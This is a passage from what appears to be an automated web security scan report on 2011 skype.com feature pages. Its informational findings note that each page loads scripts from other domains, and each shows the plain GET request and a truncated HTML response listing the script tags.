Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43550


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Conference Calls - Video Conferencing - Skype</title>
   <meta name="description" content="Ma
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.840. http://www.skype.com/intl/en/features/allfeatures/conference-calls/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/conference-calls/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/conference-calls/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43550


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Conference Calls - Video Conferencing - Skype</title>
   <meta name="description" content="Ma
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.841. http://www.skype.com/intl/en/features/allfeatures/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/facebook

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/facebook HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:44 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 46416


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype and Facebook Integration - Skype</title>
   <meta name="description" content="The laste
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.842. http://www.skype.com/intl/en/features/allfeatures/facebook/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/facebook/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/facebook/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:49 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 46416


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype and Facebook Integration - Skype</title>
   <meta name="description" content="The laste
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.843. http://www.skype.com/intl/en/features/allfeatures/group-video-calls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/group-video-calls

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/group-video-calls HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 50230


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Group Video Calling - Skype</title>
   <meta name="description" content="Make group video cal
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.844. http://www.skype.com/intl/en/features/allfeatures/group-video-calls/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/group-video-calls/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/group-video-calls/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:47 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 50230


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Group Video Calling - Skype</title>
   <meta name="description" content="Make group video cal
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.845. http://www.skype.com/intl/en/features/allfeatures/instant-messaging  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/instant-messaging

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/instant-messaging HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:44 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42794


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Instant Messenger - Download Skype IM - Skype</title>
   <meta name="description" content="Do
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.846. http://www.skype.com/intl/en/features/allfeatures/instant-messaging/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/instant-messaging/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/instant-messaging/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:47 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42794


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Instant Messenger - Download Skype IM - Skype</title>
   <meta name="description" content="Do
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.847. http://www.skype.com/intl/en/features/allfeatures/online-number  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/online-number

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/online-number HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 45634


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Online Number - Skype</title>
   <meta name="description" content="Get a personal onlin
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.848. http://www.skype.com/intl/en/features/allfeatures/online-number/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/online-number/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/online-number/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 45634


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Online Number - Skype</title>
   <meta name="description" content="Get a personal onlin
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.849. http://www.skype.com/intl/en/features/allfeatures/screen-sharing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/screen-sharing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/screen-sharing HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43914


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Screen Sharing - Skype Screen Sharing - Skype</title>
   <meta name="description" content="S
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.850. http://www.skype.com/intl/en/features/allfeatures/screen-sharing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/screen-sharing/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/screen-sharing/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:47 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43914


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Screen Sharing - Skype Screen Sharing - Skype</title>
   <meta name="description" content="S
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.851. http://www.skype.com/intl/en/features/allfeatures/send-files  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/send-files

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/send-files HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 41778


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>File Sharing - Send Files - Skype</title>
   <meta name="description" content="Send files - s
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.852. http://www.skype.com/intl/en/features/allfeatures/send-files/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/send-files/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/send-files/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:47 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 41778


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>File Sharing - Send Files - Skype</title>
   <meta name="description" content="Send files - s
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.853. http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/skype-to-go-number

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/skype-to-go-number HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 68523


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype To Go - Skype Number - Skype</title>
   <meta name="description" content="Skype to Go
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.854. http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/skype-to-go-number/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/skype-to-go-number/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:47 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 68523


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype To Go - Skype Number - Skype</title>
   <meta name="description" content="Skype to Go
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.855. http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/skype-to-skype-calls

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/skype-to-skype-calls HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44052


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype to Skype Calls - Free International Calls - Skype</title>
   <meta name="description" c
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.856. http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/skype-to-skype-calls/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/skype-to-skype-calls/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44052


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype to Skype Calls - Free International Calls - Skype</title>
   <meta name="description" c
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
